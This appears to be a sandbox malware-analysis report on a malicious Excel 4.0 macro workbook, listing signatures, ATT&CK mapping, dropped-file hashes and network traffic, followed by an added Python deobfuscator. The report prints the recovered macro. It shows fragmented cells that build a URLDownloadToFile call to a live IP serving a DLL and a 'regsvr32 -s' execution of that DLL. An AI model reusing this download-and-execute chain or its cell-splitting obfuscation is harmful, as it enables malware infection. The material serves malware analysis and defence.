Analysis Report transfer_summ_188108012.xlsb
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | String found in binary or memory: | ||
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Section loaded: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process created: |
Source: | Process information set: | Jump to behavior | ||
Source: | Binary or memory string: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | DLL Side-Loading1 | Process Injection1 | Regsvr321 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution21 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Masquerading1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.180.199.125 | unknown | Netherlands | 14576 | HOSTING-SOLUTIONSUS | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 433175 |
Start date: | 11.06.2021 |
Start time: | 12:15:10 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 18s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | transfer_summ_188108012.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.evad.winXLSB@3/9@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
Cookbook Comments: |
Warnings: |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.180.199.125 | Get hash | malicious | Browse |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
HOSTING-SOLUTIONSUS | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134922 |
Entropy (8bit): | 5.369099616380359 |
Encrypted: | false |
SSDEEP: | 1536:5cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:lEQ9DQW+ziXOe |
MD5: | 6FBCC10A912548F46EA8F1F31FDC9246 |
SHA1: | 09BE2ADC4C58CD7CC82E6E634B78FBC0E8F25422 |
SHA-256: | 71BCE31715BD4766156E7029E2277237F599BC75BF481AE149A6320D7357D772 |
SHA-512: | 2D82788DF7709AC6D75DC21469435A3494A5DF06B4FCCA15B3EFA86D536B64E36E701F8CE53E01E3E779241596B68B1772BEE519317D1A066414CA933CC9396B |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9924 |
Entropy (8bit): | 7.973758306371751 |
Encrypted: | false |
SSDEEP: | 192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB |
MD5: | B34FB4F2F0F9E70B72BA3AFD028CD97C |
SHA1: | C6868336F78DEA1E718965DF3341039581DB5B5A |
SHA-256: | 189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB |
SHA-512: | 4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 956 |
Entropy (8bit): | 7.683552542542939 |
Encrypted: | false |
SSDEEP: | 24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB |
MD5: | 32C83607A5C98C5A634278E5AED3AD61 |
SHA1: | EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362 |
SHA-256: | 4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF |
SHA-512: | AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 23989 |
Entropy (8bit): | 7.989754044300238 |
Encrypted: | false |
SSDEEP: | 384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy |
MD5: | 839795652A8FE78F26F4D86D757ABDE8 |
SHA1: | 979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60 |
SHA-256: | 1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E |
SHA-512: | E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5744 |
Entropy (8bit): | 7.966496386988271 |
Encrypted: | false |
SSDEEP: | 96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf |
MD5: | 9AD30E24270C495AE68EAF3A1EEECBFB |
SHA1: | 8642D256E7FFBEF5804A2D2220A1FE475A99DC36 |
SHA-256: | 6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20 |
SHA-512: | EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6177 |
Entropy (8bit): | 7.959095006853368 |
Encrypted: | false |
SSDEEP: | 96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a |
MD5: | C7ED6FC355D8632DB1464BE3D56BF5CC |
SHA1: | 615484A338922DDF00B903CFA48060AD60D70207 |
SHA-256: | 26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C |
SHA-512: | FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 79256 |
Entropy (8bit): | 7.8964489993388405 |
Encrypted: | false |
SSDEEP: | 1536:9+milem3l7eO+dRRVnyYPlMVGoIahaDHTU6hryF70cAeWvijWGH+:9+wol7eO6RSYP2sTU2yF70cAijW2+ |
MD5: | 9C99DB073DF24659166A16FCC7880B8A |
SHA1: | 11786CBF732FF35B91E1D43E3085FD6538986E80 |
SHA-256: | B796DA44A4EBEB360F9FBC112775F4F292D09E8BAF4593C787594C207F8FE6D7 |
SHA-512: | C03E25E596AD197C259B98D2DFA854F12518DA2BF67414689E0451F5CC0E7F4F128E47DB83385DC59F06256F73FDF597C8CCDB0EC3B1688050FA4A07C2AED235 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | true |
Preview: |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.875825877556854 |
TrID: |
File name: | transfer_summ_188108012.xlsb |
File size: | 63444 |
MD5: | 1b248ad3215a78ee6b006f3aa6bc68d7 |
SHA1: | 68d5e1de3e7a2f2a8ef3068e6ca84675388263fd |
SHA256: | 5b01a95d0fd0be91d68e35bc0d9c273eefadd24453c80a1a3a2ed3436f13220e |
SHA512: | dcf17dc636641e16c31f99769674329ebb7212ba793199cf7489c1327628f340b3b403cedaf67895a9af803d30b276b38fcdc0d143b3f4c9c3002d1324ad6284 |
SSDEEP: | 1536:eMTMXwc5jlMVGoIahaDHTU6hryF70liWWGH0AeWca:eMTi5j2sTU2yF70liWW20Ra |
File Content Preview: | PK..........!..<......z.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74f0d0d2c6d6d0f4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "transfer_summ_188108012.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
CALL(UR, UR, JJC, 0, ht, ..\jbeiwmje.dll, 0, 0)
Macro sheet cell contents (Excel 4.0 macro sheet before.2.18.42.sheet; string fragments are spread across cells and concatenated at run time) |
---|
Cell content as recovered | Role |
---|---|
ht, tp://, 185.180.199.125/s1., dll | fragments of the download URL http://185.180.199.125/s1.dll |
..\jbeiwmje.dll | local path the downloaded file is written to |
UR, LMon | fragments of the module name URLMon |
UR, LDownl, oa, dToFile, A | fragments of the export name URLDownloadToFile (the lone A is consistent with the ANSI suffix, URLDownloadToFileA) |
re, gs, ="vr32 -s " | fragments of the command regsvr32 -s |
0, JJC, CBB | other cell values: 0 appears several times; JJC and CBB are consistent with pieces of a CALL type-text string |
=CALL(BJ29&BN29,BR66&BR69&BX72&BZ72&BS25,BP81&BX73,BU64,BJ19&BJ20&BJ21&BJ22,BN24,BU69,BU72) | CALL whose module, procedure, type text and every argument are built by concatenating cells |
=EXEC(before.2.18.42.sheet!BK73&before.2.18.42.sheet!BK74&before.2.18.42.sheet!BK75&before.2.18.42.sheet!BN24) | EXEC of a command line built from four cells |
=before.2.18.42.sheet!BZ25() | call into the macro at BZ25 |
=HALT() | end of the macro |
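Added example, not part of the sandbox report and not code from the sample: a small Python resolver that reassembles the cell-fragment obfuscation shown in the table above and pulls the indicators out of the resolved CALL and EXEC. The cell map is constructed: the report shows the fragments and the CALL/EXEC/HALT formulas but not which cell holds which fragment, so the cell addresses, the entry cell A1 and the type text JJCCBB are assumptions chosen so that the formulas above resolve. The walker only follows the straight-line flow seen here; it does not implement conditional branches.

```python
import re
from typing import Dict, List, Tuple

SHEET = "before.2.18.42.sheet"

# Constructed cell map (assumption): the fragments and the CALL/EXEC/HALT formulas are the ones
# recovered from the sample, but the report does not say which cell holds which fragment, so
# the addresses below were chosen to make the formulas resolve. A1 and "JJCCBB" are assumptions.
CELLS: Dict[str, str] = {
    # fragments of the command line
    "BK73": "re", "BK74": "gs", "BK75": '="vr32 -s "', "BN24": "..\\jbeiwmje.dll",
    # fragments of the module and export name
    "BJ29": "UR", "BN29": "LMon",
    "BR66": "UR", "BR69": "LDownl", "BX72": "oa", "BZ72": "dToFile", "BS25": "A",
    # CALL type text and numeric arguments
    "BP81": "JJC", "BX73": "CBB", "BU64": "0", "BU69": "0", "BU72": "0",
    # fragments of the download URL
    "BJ19": "ht", "BJ20": "tp://", "BJ21": "185.180.199.125/s1.", "BJ22": "dll",
    # the macro itself: an entry cell that calls into BZ25, then CALL, EXEC, HALT down the column
    "A1": f"={SHEET}!BZ25()",
    "BZ25": "=CALL(BJ29&BN29,BR66&BR69&BX72&BZ72&BS25,BP81&BX73,BU64,BJ19&BJ20&BJ21&BJ22,BN24,BU69,BU72)",
    "BZ26": f"=EXEC({SHEET}!BK73&{SHEET}!BK74&{SHEET}!BK75&{SHEET}!BN24)",
    "BZ27": "=HALT()",
}

# A cell reference with an optional sheet prefix, e.g. BK73 or before.2.18.42.sheet!BK73
REF_RE = re.compile(r"(?:[A-Za-z0-9_.]+!)?([A-Z]{1,3}[0-9]{1,7})")
FUNC_RE = re.compile(r"^=([A-Z]+)\((.*)\)$", re.S)


def split_top(text: str, sep: str) -> List[str]:
    """Split on sep only outside quotes and parentheses, so literals and nested calls survive."""
    parts, cur, depth, quoted = [], [], 0, False
    for ch in text:
        if ch == '"':
            quoted = not quoted
        elif not quoted:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append("".join(cur))
                cur = []
                continue
        cur.append(ch)
    parts.append("".join(cur))
    return parts


def resolve_term(term: str, cells: Dict[str, str]) -> str:
    """One operand of a & chain: a quoted literal, a number, or a cell reference."""
    term = term.strip()
    if len(term) >= 2 and term[0] == '"' and term[-1] == '"':
        return term[1:-1]
    ref = REF_RE.fullmatch(term)
    if ref is None:
        return term
    value = cells.get(ref.group(1), "")
    # A referenced cell may itself be a formula such as ="vr32 -s "; resolve it recursively.
    return resolve_expr(value[1:], cells) if value.startswith("=") else value


def resolve_expr(expr: str, cells: Dict[str, str]) -> str:
    """Evaluate a & concatenation chain to the string the macro sees at run time."""
    return "".join(resolve_term(t, cells) for t in split_top(expr, "&"))


def decode_formula(formula: str, cells: Dict[str, str]) -> Tuple[str, List[str]]:
    """=FUNC(a,b,...) -> (FUNC, resolved args); a bare cell call like =sheet!BZ25() is a GOTO."""
    m = FUNC_RE.match(formula.strip())
    if m is None:
        ref = REF_RE.search(formula)
        return "GOTO", ([ref.group(1)] if ref else [])
    name, body = m.group(1), m.group(2)
    return name, ([resolve_expr(a, cells) for a in split_top(body, ",")] if body else [])


def next_row(ref: str) -> str:
    col, row = re.fullmatch(r"([A-Z]+)([0-9]+)", ref).groups()
    return f"{col}{int(row) + 1}"


def run_macro(entry: str, cells: Dict[str, str], max_steps: int = 64) -> List[Tuple[str, str, List[str]]]:
    """Walk the macro as Excel does: down the column from the entry cell until HALT.
    The walk is bounded because real macro sheets loop; conditional branches are not modelled."""
    actions, ref = [], entry
    for _ in range(max_steps):
        formula = cells.get(ref)
        if formula is None or not formula.startswith("="):
            break
        name, args = decode_formula(formula, cells)
        actions.append((ref, name, args))
        if name == "HALT":
            break
        ref = args[0] if name == "GOTO" and args else next_row(ref)
    return actions


def indicators(actions: List[Tuple[str, str, List[str]]]) -> Dict[str, str]:
    """Extract what a responder wants first: download URL, dropped path, executed command."""
    iocs: Dict[str, str] = {}
    for _, name, args in actions:
        # CALL(module, procedure, type_text, pCaller, szURL, szFileName, dwReserved, lpfnCB)
        if name == "CALL" and len(args) >= 6 and args[0].lower() == "urlmon" \
                and args[1].startswith("URLDownloadToFile"):
            iocs["url"], iocs["dropped_path"] = args[4], args[5]
        elif name == "EXEC" and args:
            iocs["command"] = args[0]
    return iocs


if __name__ == "__main__":
    trace = run_macro("A1", CELLS)
    for ref, name, args in trace:
        print(f"{ref:>5}  {name}({', '.join(args)})")
    print(indicators(trace))
```

Running it prints the resolved sequence GOTO, CALL(URLMon, URLDownloadToFileA, ...), EXEC(regsvr32 -s ..\jbeiwmje.dll), HALT, which is the behaviour the signatures in this report (UrlDownloadToFile, Office spawning regsvr32) describe. Against a real workbook the cell map would come from an XLM extractor rather than being typed in, but the resolution step is the same.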
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 12:16:10.141882896 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.125 |
Jun 11, 2021 12:16:13.319777012 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.125 |
Jun 11, 2021 12:16:19.382778883 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.125 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 12:15:53.493258953 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:53.551745892 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:53.809528112 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:53.873652935 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:54.708446980 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:54.761431932 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:55.995307922 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:56.066596031 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:57.111721039 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:57.163543940 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:58.253417015 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:58.319250107 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:59.332068920 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:59.385024071 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:00.630373955 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:00.681914091 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:05.749245882 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:05.807897091 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:06.852235079 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:06.940634012 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:07.438770056 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:07.512856007 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:07.771310091 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:07.821919918 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:08.481621027 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:08.540282965 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:09.525120974 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:09.585932016 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:10.231311083 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:10.292875051 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:11.346471071 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:11.405950069 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:11.523520947 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:11.593029976 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:12.497983932 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:12.548055887 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:13.893482924 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:13.943918943 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:14.892127037 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:14.942440987 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:15.660285950 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:15.718601942 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:16.331017971 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:16.381201982 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:18.312237978 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:18.362268925 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:19.281068087 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:19.333925009 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:20.226000071 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:20.276062012 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:21.346118927 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:21.373193026 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:21.407341957 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:21.426676989 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:23.506586075 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:23.578686953 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:23.714297056 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:23.785911083 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:39.888449907 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:40.038907051 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:40.713340044 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:40.774751902 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:41.361578941 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:41.409596920 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:41.438304901 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:41.471177101 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:41.901827097 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:41.963762999 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:42.533973932 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:42.682137966 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:43.247425079 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:43.307027102 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:43.741061926 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:43.799549103 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:44.967226028 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8 |
